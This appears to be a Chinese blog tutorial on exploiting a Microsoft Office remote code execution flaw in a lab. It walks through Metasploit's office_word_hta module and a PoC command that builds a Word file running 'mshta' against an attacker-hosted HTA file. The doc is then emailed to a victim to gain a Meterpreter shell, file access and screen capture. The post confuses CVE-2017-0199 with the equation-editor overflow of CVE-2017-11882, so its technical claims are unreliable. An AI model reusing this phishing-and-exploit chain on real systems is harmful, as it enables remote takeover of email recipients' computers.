利用office远程代码执行漏洞进行恶意邮件传播攻击

ゝ一世哀愁。 2022-03-20 13:58 384阅读 0赞

一、CVE-2017-0199漏洞概述

目前,利用该漏洞可以通杀office 2003至office 2016所有版本,影响office版本有:

  • office 2003
  • office 2007
  • office 2010
  • office 2013
  • office 2016
  1. 该漏洞产生原因是:由于Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
  2. 用途:利用这个漏洞,可以构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被攻击者直接控制。

二、实验过程

  1. 实验环境 (所有安装环境分享在我的网盘中链接:https://pan.baidu.com/s/1bUWiAyAMSaUfzIhdEgYEOw 提取码:a45i )
  2. 渗透机:Kali Linux + PoC测试代码(可在网盘中找到)
  3. 靶机:win7 + office 2016

一些概念:

  1. CVE:漏洞信息库
  2. PoC:漏洞测试代码。(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。使用编写好的 PoC 去验证测试目标是否存在着漏洞。常用python编写。
  3. HTA是HTML应用程序(HTML Application)的缩写,使用PoC代码将URL插入到hta文件并生成doc文件。

实验过程:

  1. 进入metasploit框架

20190213141159260.png

2.搜索需要的攻击模块并使用

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_30_color_FFFFFF_t_70

  1. 3.选择使用模块exploit/windows/fileformat/office\_word\_hta
  2. 渗透模块可以在目录/usr/share/metasploit-framework/modules/exploits/中找到

20190317213720936.png

20190317213757469.png

  1. 设置SRVHOST为攻击主机的IP,接着使用exploit命令进行渗透,开始监听。

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_30_color_FFFFFF_t_70 1

  1. 使用PoC生成带命令的doc文件

    python Command109b_CVE-2017-11882.py -c “mshta http://192.168.57.128:8080/default.hta“ -o test.doc

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_30_color_FFFFFF_t_70 2

6.将生成的test.doc压缩后通过邮件发送给win 7系统的用户,被害者接收了邮件并打开。

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_16_color_FFFFFF_t_70

20190317212852988.png

7.在win7 系统用户打开该Word文件后,可在渗透机观察到已经监听到了一个session。

查看session, 进入会话。

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_16_color_FFFFFF_t_70 1

  1. 进入会话后,用metepreter对会话进行管理,可使用help命令查看metepreter的常用命令。

例如,可用shell命令进入到靶机的系统。

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_16_color_FFFFFF_t_70 2

9.若出现乱码,可以输入命令chcp 65001解决

201903172155492.png

10.进入到靶机系统中后,我们可对靶机的文件进行增删改查等操作,此时靶机已被控制。

还可以查看靶机的系统信息等

20190213144445970.png

还可以截取靶机的屏幕进行查看

20190317215751307.png

此时可以观察到靶机用户正在浏览的屏幕信息。

watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3JvYmFjY28_size_16_color_FFFFFF_t_70 3

发表评论

表情:
评论列表 (有 0 条评论,384人围观)

还没有评论,来说两句吧...

相关阅读